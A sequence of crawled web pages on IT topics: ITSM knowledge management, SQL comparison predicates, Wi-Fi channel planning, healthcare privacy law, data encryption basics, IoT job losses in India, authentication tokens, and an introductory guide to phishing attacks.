The DIKW model underpins Knowledge Management in ITIL v3, where it is described as a growth path toward understanding. The concept builds on the traditional view that data becomes more beneficial once it is refined and processed into information. The pyramid applies naturally to ITSM, since ITSM runs on knowledge: critical data is produced in the course of day-to-day operations and service delivery, both as metrics and through the research the help desk performs when responding to queries. This data becomes information when it is examined, contextualized, and presented in a dashboard or report, where it supports data-driven decisions. Finally, knowledge becomes wisdom when individuals apply it with insight to resolve difficult challenges or devise novel solutions.
One fundamental aspect of ITSM is to codify as much information as is practical to support service work. Service delivery comprises all activities performed by IT operations. In ITSM, knowledge is not only internalized for organizational use; previously documented knowledge also changes the way processes are carried out.
Comparison predicates compare two expressions and return whether the comparison is true.
The following table lists the comparison predicates you can use:

| Predicate | Meaning |
|-----------|---------|
| != | Inequality check (the aliases <> and ^= also exist for this) |
| < | Check for "less than" |
| <= | Check for "less than or equal to" |
| > | Check for "greater than" |
| >= | Check for "greater than or equal to" |
- If one of the two expressions is a NULL value, the result is also a NULL value. | <urn:uuid:e0d26006-233b-4040-b1bd-5901497a1a44> | CC-MAIN-2022-40 | https://docs.exasol.com/db/6.2/sql_references/predicates/comparison_predicates.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00761.warc.gz | en | 0.705138 | 147 | 2.609375 | 3 |
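The NULL rule above can be observed directly. The sketch below uses SQLite (via Python's sqlite3 module) purely for illustration; SQLite supports the != and <> operators but not the ^= alias mentioned above.

```python
import sqlite3

con = sqlite3.connect(":memory:")
# A true comparison yields 1, a false one 0, and any comparison
# against NULL yields NULL (surfaced in Python as None).
row = con.execute("SELECT 1 < 2, 2 <> 2, NULL = 1").fetchone()
print(row)  # (1, 0, None)
```

Note that the NULL comparison is not "false": it propagates as NULL, exactly as the rule states.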
There are many tasks associated with properly designing and deploying a wireless network, and one of the most important is developing a channel plan. A well-developed channel scheme will help you squeeze the most out of every bit of precious airtime, which is one of the foundations of a high-performing Wi-Fi network.
Before we go too much further, let's go over a few of the basics. The IEEE 802.11 standard defines operation for wireless networks in the 2.4 GHz, 5 GHz, and now 6 GHz frequency ranges. Depending on where you are in the world, the number of channels you have access to, and the rules and regulations governing them, will differ.
In the United States, the 2.4 GHz band is broken up into 11 channels (1-11), each 20MHz wide. In the 5 GHz band, we have channels ranging from 36 up to 165, and in the 6 GHz band, we have Wi-Fi channels ranging from 1-233.
2.4 GHz Channel Planning
Even though there are 11 channels available in 2.4 GHz in the US, only 3 of them do not "overlap" or interfere with one another: 1, 6, and 11.
2.4 GHz Channel Overlap & Adjacent Channel Interference
Without getting too deep on how wireless communication happens, when a station (Access Point, client device, etc.) has something to transmit, it must wait for the channel to be clear. Put simply, only one device can successfully transmit at a time. When overlapping channels are used, any stations (STAs) on those channels will transmit independent of what is happening on the other channels, causing a degradation of performance. Think of it like being between radio stations and having a mix of country overlapping on your favorite metal station. This type of interference is called Adjacent Channel Interference (ACI).
2.4GHz Channel Overlap. Source: Ekahau ECSE Design Course
Adjacent Channel Interference. Source: Ekahau ECSE Design Course
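The 1/6/11 plan falls straight out of the channel arithmetic. In the 2.4 GHz band, channel centers sit 5 MHz apart starting at 2412 MHz, and the classic 802.11 channels are roughly 22 MHz wide, so non-overlapping channels need centers at least 25 MHz apart:

```python
def center_mhz(ch):
    """Center frequency of a 2.4 GHz channel (channel 1 = 2412 MHz, 5 MHz steps)."""
    return 2407 + 5 * ch

# With ~22 MHz-wide channels, centers must be >= 25 MHz apart to avoid
# overlap -- which leaves exactly 1, 6, and 11 in the US.
plan = [1, 6, 11]
gaps = [center_mhz(b) - center_mhz(a) for a, b in zip(plan, plan[1:])]
print([center_mhz(c) for c in plan], gaps)  # [2412, 2437, 2462] [25, 25]
```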
2.4 GHz Co-Channel Interference
Co-Channel Interference (CCI), on the other hand, is when 2 or more AP’s that are in the same area are operating on the same channel. This essentially turns both cells (a cell is the coverage area for an AP) into one big cell. This means that any STA that has anything to transmit now must wait for not only the other STAs associated to the same AP, but also all the STAs associated to the other AP on the same channel. While not as damaging as ACI, CCI will also degrade performance. This is caused by more devices trying to gain access to the wireless medium on the same channel, making STAs wait longer for their chance to transmit.
2.4 GHz CCI (Co-Channel Interference) Source: Ekahau ECSE Design Course
Up to this point, we have only used the 2.4 GHz band for examples. Given its limited amount of available spectrum, it is highly recommended to use only the non-overlapping 20 MHz channels there.
5 GHz Channel Planning
Now that we have that covered, let’s move the discussion over to 5 GHz. There is significantly more spectrum available in this band, with each channel occupying its own 20 MHz non-overlapping slice. This is where the topic of channel width gets interesting.
Choosing the Right Channel Width for Your Wi-Fi Network
Whether you are using a static channel plan or a vendor’s dynamic channel assessment/assignment algorithm (pretty much all of them offer some version of this functionality), there are a few things to consider besides just picking Wi-Fi channels. One of the most important is deciding on the proper channel width to use.
Standard 20 MHz channels can be combined to increase the size of the channel with the goal of achieving a higher data rate. The wider the channel, the more data can be pushed through it. You know those impressive throughput numbers vendor’s love to tout in the AP datasheets? Those are achieved by using these wide channels. Some vendors’ equipment these days is even set to these wide channels by default right out of the box.
These wide Wi-Fi channels are created by bonding multiple adjacent 20MHz channels together, using the center frequency to denote the channel. For example, channels 36 and 40 (each 20MHz) are bound together to make 40MHz channel 38, etc.
Source: Wireless LAN Professionals
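Because 5 GHz channel numbers advance in 5 MHz steps, the bonded channel's number is simply the average of its member channels, which is a quick way to sanity-check a channel plan:

```python
def bonded_channel(members):
    """Center channel number of a bonded 5 GHz channel (5 MHz per channel number)."""
    return sum(members) // len(members)

print(bonded_channel([36, 40]))          # 38 -> a 40 MHz channel
print(bonded_channel([36, 40, 44, 48]))  # 42 -> an 80 MHz channel
```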
Sounds great, right? So why not just set your APs to the widest channel available and call it a day? Let’s refer back to the beginning of this post, particularly where we discussed Co-Channel Interference (CCI). The 5 GHz band allows for 9 20MHz channels in UNII-1 and UNII-3 (non-DFS). There are another 16 20MHz channels in UNII-2 (DFS), but these come with their own set of complications, which we will discuss later in the blog.
Let’s say we have decided to use 80MHz channels for our deployment. We just went from 25 non-overlapping channels down to 6. Now, for APs that are at opposite ends of the facility that cannot hear each other too loudly, this is not really a problem. Where problems begin is APs that are in close proximity to each other (hearing each other with at least 4dB above noise floor, typically around -85 dBm or higher). These APs, and any STAs associated to them, now all become part of the same cell, slowing everything down due to increased contention. All STAs need to wait their turn to access the medium.
The other item to consider here is that every time you double the channel width (20 MHz to 40 MHz, 40 MHz to 80 MHz, etc.), you introduce an extra 3 dB of noise into the channel, effectively doubling the noise power. Put simply, you now have more noise with no gain in signal. This equates to a lower SNR (Signal-to-Noise Ratio), which will in turn force a lower MCS rate, shrinking your data rate and throughput, possibly negating the benefits of channel aggregation entirely, or even resulting in lower capacity than 20 MHz channels.
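The 3 dB figure is just the decibel form of doubling the bandwidth, and it compounds with each doubling:

```python
import math

def noise_penalty_db(old_mhz, new_mhz):
    """Extra noise power picked up by widening the channel, in dB."""
    return 10 * math.log10(new_mhz / old_mhz)

print(round(noise_penalty_db(20, 40), 2))  # 3.01 dB per doubling
print(round(noise_penalty_db(20, 80), 2))  # 6.02 dB for 20 -> 80 MHz
```

With a fixed signal level, every one of those decibels comes straight out of your SNR.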
Using Mixed Channel Widths in Wi-Fi
Adding to the topic of bonding channels in 5 GHz: if your own infrastructure mixes wide and narrow channels, or neighboring wireless networks around you use wide 5 GHz channels, performance can degrade on both sides. The causes are an increased number of collisions (and therefore retransmissions) and the protocol overhead added by protection mechanisms in the form of Request to Send / Clear to Send (RTS/CTS) control frames.
One of the hallmarks of a high-performing Wi-Fi network is channel reuse. This is the practice of deploying channels in such a manner that they limit the amount of CCI introduced into the environment. The best way to achieve this is by having as many channels to deploy as possible. While a 20MHz channel will not achieve the higher data rates that are advertised with 80MHz, clients can still reach acceptable speeds, allowing you to optimally use every bit of available airtime.
All of this said, every situation is different. What if you have one AP at your small or home office, decent SNR everywhere and no neighbors/outside sources of contention? Set it to 80MHz or 160MHz and let it rip!
If you have a small to medium size deployment and have done your homework (with Ekahau Pro, of course!) to ensure you can use 40MHz channels, give it a shot!
Use wide channels until you can’t.
The bottom line is that for most enterprise-type deployments with many APs, sticking with narrow Wi-Fi channels will give you the spatial reuse you need for your WLAN to perform optimally and leave users satisfied.
Other Considerations for your 5 GHz Channel Planning
Some of the 5 GHz band may be affected by radar activity on channels known as DFS (Dynamic Frequency Selection) channels. Of the 25 available 5 GHz channels in the US and EU, only 9 of the 20 MHz channels (UNII-1 and UNII-3) are unaffected by it. As part of 802.11h DFS compliance, when radar activity is detected the AP must stop transmitting on the channel within 200 ms; clients then have 10 seconds to move to a different channel, and the AP will stay silent for 60 seconds before switching to a non-DFS channel and resuming transmission. The channel on which DFS activity was observed also enters a 30-minute non-occupancy period. But it's not just the access points that respond to DFS channels: Wi-Fi client devices also behave differently depending on whether they are using DFS channels or not.
Passive Scanning Clients
If our Wi-Fi client devices are using passive scanning to discover an SSID, they move onto a Wi-Fi channel (let's say channel 36 on the 5 GHz band as an example) and wait a period of time (around 105 ms) for a beacon. Once the device has finished waiting on channel 36, it moves on to the next channel (40 in this example), waits another 105 ms for a beacon and, if it still hasn't heard the SSID it wants to connect to, continues moving through the channels until it finally does, at which point it will begin the association process.
I know that 105ms doesn’t sound like a long time, but when you multiply that by the 25 channels available in 5GHz, it quickly adds up!
Active Scanning Clients
Moving on to active scanning: rather than waiting on a channel to listen for beacons, the device goes onto each channel and sends a frame called a "Probe Request", to which APs respond with a "Probe Response" frame containing the list of SSIDs their radios support. The main difference is speed: active scanning can be up to 5X faster than passive scanning, as a probe request/response exchange typically takes around 20 ms.
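A rough back-of-the-envelope comparison using the dwell times above (and ignoring, for simplicity, that active scanning is not permitted on DFS channels):

```python
CHANNELS_5GHZ = 25       # US 5 GHz channels, per the text
PASSIVE_DWELL_MS = 105   # wait for a beacon
ACTIVE_DWELL_MS = 20     # probe request/response exchange

passive = CHANNELS_5GHZ * PASSIVE_DWELL_MS
active = CHANNELS_5GHZ * ACTIVE_DWELL_MS
print(passive, active, round(passive / active, 2))  # 2625 500 5.25
```

Over two and a half seconds of pure scanning versus half a second is the difference a roaming voice client will feel.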
Sounds good, right? So why do our devices not always use active scanning instead of passive scanning? Well, there is a slight catch here. Wi-Fi client devices can only send Probe Request frames on non DFS channels. That means they can only do active scanning on the UNII-1 & UNII-3 channels, whereas on the UNII-2 & UNII-2c channels, they can only do passive scanning.
If you have an environment where you are using the DFS channels in 5 GHz, roaming for your client devices may be noticeably slower. If your devices are using any time-sensitive applications over Wi-Fi, like a voice call for example, the experience may be poor.
Remember, not all Wi-Fi client devices support all of the DFS channels, and some devices may not support them at all! If this is the case and you have the DFS channels enabled in your environment and a Wi-Fi client device comes along that does not have support for the DFS channels you have enabled – well guess what, they will not even be able to hear or discover any Wi-Fi on 5 GHz in that area. To these devices, it will seem like there is no Wi-Fi there at all or that you have a massive coverage hole in your design.
Please make sure that you check your device’s manufacturer data sheet to get a clear idea of which 5GHz channels they support!
Want to Learn More?
For even more tips on Wi-Fi channel planning best practices, register for our upcoming webinar, Demystifying Wi-Fi: Channel Planning Made Simple. In the webinar, we’ll dive deeper into Wi-Fi channel planning by discussing:
- What are Wi-Fi channels?
- How channel overlap occurs and how to plan around it
- The difference between adjacent channel & co-channel interference
- CSMA/CA aka DCF aka “The Game”
- Band comparison of 2.4 GHz and 5 GHz and how they each inform channel planning
- Optimizing for the right channel widths for your network | <urn:uuid:71a1c3a0-d25d-47a7-a283-251954269640> | CC-MAIN-2022-40 | https://www.ekahau.com/blog/channel-planning-best-practices-for-better-wi-fi/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00761.warc.gz | en | 0.945619 | 2,609 | 3.234375 | 3 |
Complying with Data Protection Legislation and Meeting the Changing Needs
As globalization and the Internet grew, data began to travel across international borders. This free flow of data created the need for regulations governing data collection, quality, security, and usage. In 1980, the Organisation for Economic Co-operation and Development (OECD) published its Guidelines on the Protection of Privacy and Transborder Flows of Personal Data. The laws have continued to evolve since to tackle newer risks and changing needs.
History of Data Privacy Laws & Legislations
The concept of data privacy has evolved over the years, and the word "privacy" now holds high significance for individuals and businesses alike. In 2004, the U.S. government decided to ensure that patient data was stored in electronic health record systems by 2014. Today, the digitization of records has helped the healthcare industry serve its patients better. However, with this move, the need for privacy, confidentiality, and security became imminent, as records were accessed by doctors, medical providers, pharmaceutical companies, and family members. As the digital exchange of information increased, several rules and regulations were established to govern the privacy of patient data, including HIPAA, GDPR, CCPA, and PIPEDA.
- The Health Insurance Portability and Accountability Act (HIPAA) of 1996 was passed to protect individuals’ health information. The Act prevents sensitive information pertaining to patient health from being disclosed without the patient’s consent or knowledge.
- General Data Protection Regulation (GDPR) came into effect in 2018. Created for data protection and privacy in the EU and EEA, GDPR is considered one of the most robust privacy laws in the world and aims to give EU citizens control over their personal data.
- The California Consumer Privacy Act (CCPA) was established in 2018 to give consumers better control over the personal information collected by businesses.
- Personal Information Protection and Electronic Documents Act (PIPEDA) defines the roles for private organizations to collect, use, and disclose personal information.
However, the implementation of these laws does not guarantee complete data protection. These laws, while useful, are not comprehensive enough to cover the complexities of data privacy and management. With newer technologies such as artificial intelligence coming into play, the need to renew privacy laws is more important now than ever. It is observed that existing laws, such as HIPAA, still have gaps with respect to their security and privacy definitions.
Emerging Privacy Risks
In recent years, the healthcare industry has fallen victim to ransomware attacks and data breaches leading to loss of reputation, money, and trust. With the advancement in ICT technologies, healthcare providers offer better service to patients by digitally accessing their history through stored Protected Health Information (PHI), which includes the patient’s name and address, the medical treatment provided, medical conditions, social security number, etc. As confidential information is stored in a location accessible by different people, the risk for breach increases. Listed below are some of the different types of privacy risks for healthcare organizations —
- PHI risk – Frequent complaints include impermissible uses of PHI, lack of safeguards of PHI, and disclosure of more than the minimum necessary PHI to unauthorized parties
- System vulnerability risk – Use of old legacy system without proper security updates
- Firewall risk – Open access to data without proper authentication
- Cybersecurity risk – Malware and ransomware attack through phishing emails and malicious links
Addressing Data Breaches and Privacy Risks
According to a recent report from Gartner, 50% of large organizations will adopt privacy-enhancing computations by 2025 for processing data in untrusted environments or multi-party data analytics use cases. While the path to complete data protection is being paved, it is crucial for organizations to focus on the best practices while remaining compliant. As one of the comprehensive privacy laws in the world, GDPR requires the appointment of a Data Protection Officer (DPO) to oversee the company’s data protection strategy and ensure compliance with the regulation. GAVS recommends:
- Regulatory compliance management – Compliance with data privacy laws helps protect the information stored within the system.
- Endpoint protection – Enabling multi-factor or dual authentication (MFA) ensures the data is always protected to avoid unauthorized access.
- Anomaly detection – Artificial intelligence can be leveraged to test for usage anomalies and alert concerned teams proactively.
- Disaster recovery – Create off-site data backup for faster recovery in case of malware or phishing attacks.
- Employee training – Educate employees across the organization through security awareness training to avoid human negligence, errors, or internal bad actors.
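As a sketch of the anomaly-detection recommendation above, a simple statistical check can flag unusual access patterns before they become breaches. The data and threshold below are invented for illustration; production systems would use far richer models:

```python
from statistics import mean, stdev

def flag_anomalies(counts, threshold=3.0):
    """Flag days whose record-access count is > threshold std devs from the mean."""
    mu, sigma = mean(counts), stdev(counts)
    return [i for i, c in enumerate(counts) if abs(c - mu) > threshold * sigma]

daily_accesses = [102, 98, 110, 95, 105, 990, 101]  # one day looks like exfiltration
print(flag_anomalies(daily_accesses, threshold=2.0))  # [5]
```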
GAVS has also conducted a webinar, ‘Emerging Risks on Data Protection in Healthcare.’ To watch, click here.
GAVS offers a range of data privacy services and solutions designed to protect an organization’s information over the entire data lifecycle – from acquisition to disposal. To learn more about our offerings in the healthcare segment, please visit https://www.gavstech.com/healthcare/. | <urn:uuid:9de80f8d-0570-471b-9409-f5f74b38dc44> | CC-MAIN-2022-40 | https://www.gavstech.com/complying-with-data-protection-legislation-and-meeting-the-changing-needs/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00761.warc.gz | en | 0.914546 | 1,198 | 3.3125 | 3 |
When it comes to your data, one of the essential things you need to take care of is data encryption. While dealing with exclusive data related to any sensitive business, you should ensure that it is protected and properly encoded.
When you collect customer information, you’re responsible for protecting their private data. That is why businesses need to use data encryption since it is a professional and unbreachable form of data protection.
Here’s all you need to know about data encryption and why it’s important to implement it.
Data encryption is the process of translating data into another form or code. The primary purpose of this process is to enable people with a security key or password to access their data.
The world’s biggest organizations use this effective security method to protect their data. Since data is stored on computer systems and transmitted via the internet, data encryptions do their best to keep everything confidential.
Unencrypted data is usually known as plain text, while encrypted data is called ciphertext.
Modern encryption algorithms have since replaced the outdated Data Encryption Standard (DES) and play an important role in IT system security. Let's discuss the importance of data encryption in more detail.
Data encryption is essential to prioritize key security initiations such as integrity, authentication, and non-repudiation. Firstly, integrity ensures honest communication by checking that the message’s contents remain the same.
On the other hand, authentication verifies the origin of the message. Lastly, non-repudiation ensures the sender cannot later deny having sent the message.
Overall, it’s good to encrypt your data, even on a smaller scale. If any of your devices are stolen, it’s easier for the thief to access your data. That is unless you make sure to encrypt your sensitive data.
Any organization that collects personally identifiable information (PII) from its customers must practice data encryption. Common forms of PII that are collected are names, social security numbers, birthdates, and financial information.
If a customer’s personal information is leaked or stolen, then it'll be your company’s legal status and reputation on the line.
Data encryption utilizes mathematical algorithms to scramble your data in the form of messages. As a result, only users with the cipher or key from the sender will be able to access that message.
There are two main types of data encryptions:
Public-key encryption is another name for asymmetric encryption. Asymmetric encryption secures your messages and any data exchanged between two parties: each user of a messaging platform or email service holds one public key and one private key.
The public key can be shared openly, like an address, while the private key stays secret and is what decrypts the data. Unless a hacker obtains your private key, they will never be able to read your messages.
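The public/private key relationship can be made concrete with a toy RSA example. The primes here are tiny and purely illustrative; real keys are thousands of bits long, and this sketch is nowhere near secure:

```python
# Toy RSA: the public key (e, n) encrypts, the private key d decrypts.
p, q = 61, 53
n = p * q                 # 3233, the public modulus
phi = (p - 1) * (q - 1)   # 3120
e = 17                    # public exponent
d = pow(e, -1, phi)       # private exponent (modular inverse, Python 3.8+)

msg = 42
cipher = pow(msg, e, n)   # anyone can encrypt with the public key
plain = pow(cipher, d, n) # only the private key recovers the message
print(cipher, plain)      # 2557 42
```

Notice that knowing (e, n) alone is not enough to decrypt; recovering d requires factoring n, which is what makes real-sized RSA hard to break.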
Symmetric encryption secures your data with a single private key, while asymmetric encryption combines public and private keys. The Advanced Encryption Standard (AES) is one form of symmetric encryption, which scrambles data through multiple rounds of transformation. This US government encryption standard uses 128-, 192-, or 256-bit keys.
In practice, these keys are often derived from passwords, making the password the only way to access the data. This is why you must ensure your password is strong and hard to breach.
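Deriving a symmetric key from a password is typically done with a key-derivation function such as PBKDF2, available in Python's standard library. The salt and iteration count below are illustrative placeholders:

```python
import hashlib

password = b"correct horse battery staple"
salt = b"\x00" * 16  # in practice: random, and stored alongside the ciphertext
# Derive a 256-bit key from the password using PBKDF2-HMAC-SHA256.
key = hashlib.pbkdf2_hmac("sha256", password, salt, iterations=100_000, dklen=32)
print(len(key) * 8)  # 256 -- sized for use as an AES-256 key
```

The many iterations deliberately slow down brute-force guessing, which is what makes a password-derived key workable at all.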
Aside from symmetric and asymmetric encryption, there are more ways to categorize data encryption. Here are the three most common examples of data encryption:
With individual file encryption, you can choose to encrypt only the specific items you want. This type of encryption works best if you only have a few critical files on your device you want to encrypt. After all, selected encryption is better than having no encryption.
If you want to encrypt your computer entirely, it’s best to opt for full-disk or whole-disk encryption. In this case, you won’t have to save your sensitive data in a particular place on the disk, making it transparent.
Whole-disk encryption ensures every file on your device is encrypted. As a result, you’ll have to enter an encryption passcode whenever you power on your computer. Then, you’ll be able to access your files usually.
Lastly, you can choose volume encryption, in which your computer creates a container that’s already fully encrypted. Then, you can simply move your important files and folders to that folder to protect them.
Specific industry standards govern the usage of data encryption algorithms in organizations. Here are two of the most important standards of data encryption that you should know of.
The Common Criteria (CC) is not technically an encryption standard. Instead, it's a set of international guidelines for verifying that a product's security claims hold up under testing. However, CC evaluations have increasingly begun to treat data encryption as a necessity.
The Federal Information Processing Standards (FIPS) support the US Federal Information Security Management Act (FISMA) and govern systems used by the US government. As a result, almost all US government agencies require this standard of data encryption.
There’s no doubt that data encryption can be pretty pricey, but a data breach will cost you even more. For example, full-disk encryption costs about $235, but this price can rise if you lose your security key.
Here are a few tips to keep in mind while performing data encryption:
Now that you’re all aware of data encryption, you’re all set to avail its benefits. Data encryption is one of the essential parts of the data security world.
If you want to learn more about data encryption, contact Accountable HQ today. We are a risk & compliance software-as-a-service (SaaS) company that provides information sources on data security, data privacy legislation, risk management, and other cybersecurity-related issues. | <urn:uuid:1afaf082-69de-4956-a7cf-769d0e61b950> | CC-MAIN-2022-40 | https://www.accountablehq.com/page/data-encryption | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00761.warc.gz | en | 0.909277 | 1,221 | 3.296875 | 3 |
Space is big. REALLY big. So big, in fact, that we measure distance by the speed that light itself travels in one year. Our closest neighboring star, Alpha Centauri, is 4.3 light years away. That’s 25 trillion miles! Despite this, scientists are already coming up with plans to cross this insane distance. Are you ready for the most epic road trip in the universe?
The Internet of Things (IoT) may be introducing many new possibilities into our work and domestic lives, but there are fears it could lead to mass layoffs in the future.
A report published last week by consulting firm Zinnov claims that IoT will impact a staggering 120,000 jobs in India by 2021, of which up to 94,000 could be redundancies.
Meanwhile, only 25,000 jobs will be created within the next few years. The main cause of this will be increased automation, whereby humans are replaced by technologies capable of handling the same job.
IoT causes mass job losses
Connected chips, gadgets and machinery will have detrimental effects in areas such as office work, support and maintenance, it’s thought. Only more skilled employees – such as network engineers and robotics coordinators – will keep their jobs.
The connected tech market will account for 5 percent of the global technology industry and be worth $15 billion within the next few years, according to Nasscom.
India currently contributes $1.6 billion to the global IoT industry, says Zinnov, but this will reach $7.3 billion by 2021. The country’s corporate sector is driving the industry, making up 80 percent of the country’s overall contribution.
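Those Zinnov figures imply a steep growth rate. As a rough sketch, assuming a 2017 baseline for the 2021 target (the article does not state the baseline year), the implied compound annual growth rate is:

```python
start, end, years = 1.6, 7.3, 4  # $bn; 2017 baseline assumed for the 2021 target
cagr = (end / start) ** (1 / years) - 1
print(f"{cagr:.1%}")  # roughly 46% compound annual growth
```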
The government only funds 20 percent of the domestic IoT market, perhaps due to a lack of understanding and interest in the area. Firms, on the other hand, are looking for ways to save money and streamline their operations.
Automation to affect whole tech sector
Recently, US tech analyst HfS Research said the technology sector in India will lose more than 4 million jobs by 2021. This, it claimed, will come down to companies automating low-skilled jobs.
Hardik Tiwari, engagement lead at Zinnov, told the Economic Times that thousands of jobs will be affected in India. However, countries like the UK and US will also be impacted in similar ways.
“Internet-of-things technology will impact 120,000 jobs in the country by 2021. 94,000 jobs will be eliminated, and 25,000 jobs will be created in the five-year period,” he said.
Tiwari explained that service companies are reaching out to IoT companies with unique products, something that’ll help the Indian IoT industry develop into a global leader.
“There is a lot of demand from service providers for niche internet-for-things players with intellectual property and platforms. This will help increase the industry’s market share.”
Automation needs care
Nitin Rakesh, CEO and president of global IT and business solutions provider Syntel, told Internet of Business that companies experimenting with automation need to ensure they have “robust” strategies in place.
“A robust and holistic approach to enterprise automation provides a central backbone that empowers companies to modernise so they can survive and thrive in the two-speed world and harness the capabilities of the new IoT paradigm,” he said.
“As the IoT tidal wave gathers strength, a gap is emerging between companies reliant on ageing legacy systems and the growing demand for digital connectivity by consumers. This digital disconnect will create unprecedented challenges for companies across many sectors, including banking, insurance, healthcare and manufacturing.
“In order for companies to become IoT ready, they must find a way to unlock the data within their legacy systems whilst upgrading to more modern digital platforms that support the constant stream of real-time data that IoT-connected devices generate.” | <urn:uuid:c4409f0d-5c7f-4723-92f4-7eb8f52ba2bc> | CC-MAIN-2022-40 | https://internetofbusiness.com/iot-result-94000-job-losses/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00761.warc.gz | en | 0.941544 | 734 | 2.671875 | 3 |
Proving your identity in order to authenticate yourself and gain access to some kind of system is more of a challenge than most people realize. This process has to be designed so that on one hand it’s as easy as possible for the user of the system to gain access, while on the other it’s as difficult as possible for someone who isn’t authorized to gain access. We’ll look at how tokens fit into the authentication process, as well as the different types of tokens – including hard tokens, soft tokens, and everything in between.
A simple password doesn’t cut it for most systems, especially ones with higher risks or sensitivity attached to them. One of the most effective ways of strengthening authentication is “Multi-Factor Authentication”, or MFA.
There are 3 independent classes of authentication factors:
1) Something you “know”: a password or PIN, or an answer to a question
2) Something you “have”: a token, credit card or mobile device
3) Something you “are”: biometric data, such as fingerprints, or behavioral data such as keystrokes
With multi-factor authentication, a user must present proof from at least 2 of these independent factor classes.
This introduces the concept of a token: something that is used to prove one of the independent factors described above. Authentication tokens are generally divided into 2 groups: hard tokens and soft tokens. Hard tokens (hardware token = hard token) are physical devices used to gain access to an electronically restricted resource. Soft tokens (software token = soft token) are just that: authentication tokens that are not physically tangible, but exist as software on common devices (for example, computers or phones).
Hard Tokens Have Done Their Bit
When it comes to security tokens, most people think of hardware tokens – such as smart cards, Bluetooth tokens, one-time password (OTP) keyfobs, or USB keys. The most common one, RSA SecurID, has been on the market since 2002 (yes, that’s already 15 years). A newer contender in this field is Universal 2nd Factor (U2F), which builds on the Fast IDentity Online (FIDO) authentication standard.
Hard tokens have a number of challenges: They’re relatively expensive, easy to lose, and their administration and maintenance often take a heavy toll on IT departments. They’re also vulnerable to theft, breach of codes, and man-in-the-middle attacks.
Soft Tokens: Where UX meets TCO
Software tokens have a number of advantages over hardware tokens. They can’t be lost, they can be automatically updated, the incremental cost for each additional token is negligible, and they can be distributed to users instantly, anywhere in the world.
Nowadays, given that nearly everyone has a smartphone, soft tokens are typically incorporated into the phone itself (usually in the form of an app), so there is no extra piece of hardware to carry around.
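To make this concrete, here is a minimal sketch of how such an app typically derives its codes, using the open one-time-password algorithms HOTP (RFC 4226) and its time-based variant TOTP (RFC 6238). This is a generic illustration, not the proprietary scheme of any vendor mentioned here:

```python
import hashlib
import hmac
import struct
import time

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """HMAC-based one-time password (RFC 4226)."""
    msg = struct.pack(">Q", counter)                       # 8-byte big-endian counter
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                             # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(secret: bytes, period: int = 30, digits: int = 6) -> str:
    """Time-based OTP (RFC 6238): HOTP over the current 30-second time step."""
    return hotp(secret, int(time.time()) // period, digits)
```

The server holds the same shared secret and computes the same code, so a match proves possession of the secret; because the code rolls over every 30 seconds, an intercepted value is only briefly useful.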
In multiple recent reviews Gartner addressed the increased use of phone-as-a-token methods, noting in their Technology Insight for Phone-as-a-Token Authentication report that “authentication methods that co-opt users’ mobile phones as tokens are widely adopted”, and “by the end of 2019, 50% of enterprises using phone-as-a-token authentication will use mobile push in preference to other modes, compared with less than 10% today.” Gartner’s “phone-as-a-token” category relates to all kinds of mobile-based authentication, including soft tokens, OTP and push notification.
Interestingly, the report also warns that “security and risk management leaders must carefully evaluate them against trust and user experience needs, especially when the phone itself is the endpoint device.”
The Right Authentication Solution For You
Over the next 5 years, Gartner sees a move away from hard tokens, with some of the reasons for this move outlined above. Soft tokens, especially when incorporated into smartphones, are certainly where the industry is heading, but have their drawbacks especially from a security perspective.
For the highest levels of both ease and security, Secret Double Octopus offers password-free multi-factor authentication (MFA) through its mobile-based Octopus Authenticator, which leverages secret sharing to deliver high-assurance, password-free authentication within enterprises.
Secret Double Octopus removes the nuisances of authentication – one-time passwords (OTP), SMS codes, and authentication tokens – while offering increased security, with no additional hardware involved.
Octopus Authenticator is the industry’s only solution to overcome the challenges inherent in the soft tokens available on the market today. With multi-route security made possible by the secret sharing scheme, Secret Double Octopus’ Octopus Authenticator offers an unobtrusive and frictionless user experience and the best level of security. | <urn:uuid:bd878a9b-4f6c-40a9-832e-68f9c4e25b8e> | CC-MAIN-2022-40 | https://doubleoctopus.com/blog/access-management/tokens-hard-soft-and-whats-in-between/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00761.warc.gz | en | 0.924512 | 1,035 | 3.140625 | 3 |
As web security improves, email security has become a bigger problem than ever. The overwhelming majority of malware attacks now come from email — as high as 89 percent, according to HP Wolf Security research. And with many employees getting multiple emails per day, it’s easy for spam emails to slip their notice.
Approximately 83 percent of organizations said they faced a successful phishing attempt in 2021, up from 57 percent in 2020. As phishing attacks become more prevalent and more successful, often serving as a gateway for further attacks like ransomware and advanced persistent threats (APTs), businesses need to prioritize protections against them. But in order to do so effectively, companies need to know more about the threat they’re facing. This guide breaks down the different types of phishing attacks and provides examples to help organizations better prepare their staff to deal with them.
- What is Phishing?
- Types of Phishing Attacks & Their Defenses
- Common Examples of Phishing Attacks
- What Can Help to Protect You from Phishing?
- Phishing Protection Doubles as Malware and Ransomware Protection
What is Phishing?
Phishing is a type of social engineering attack in which bad actors pose as a trustworthy entity via phone, email, or text message in order to steal personal information from the recipient. Attackers may try to get their victims to reveal their date of birth, social security number, credit card information, or account passwords. They may also try to trick the recipient into clicking on a malicious link that would download malware onto their computer, giving them access to sensitive information.
Types of Phishing Attacks & Their Defenses
There are several types of phishing attacks that businesses should be prepared for: spear phishing, whaling, clone phishing, vishing, and smishing.
Spear phishing attempts are targeted toward specific individuals or groups of individuals. They may include the recipient’s name, position, company, or other information that would set the potential victim at ease. The attacker may even claim they’re the recipient’s boss with an urgent request.
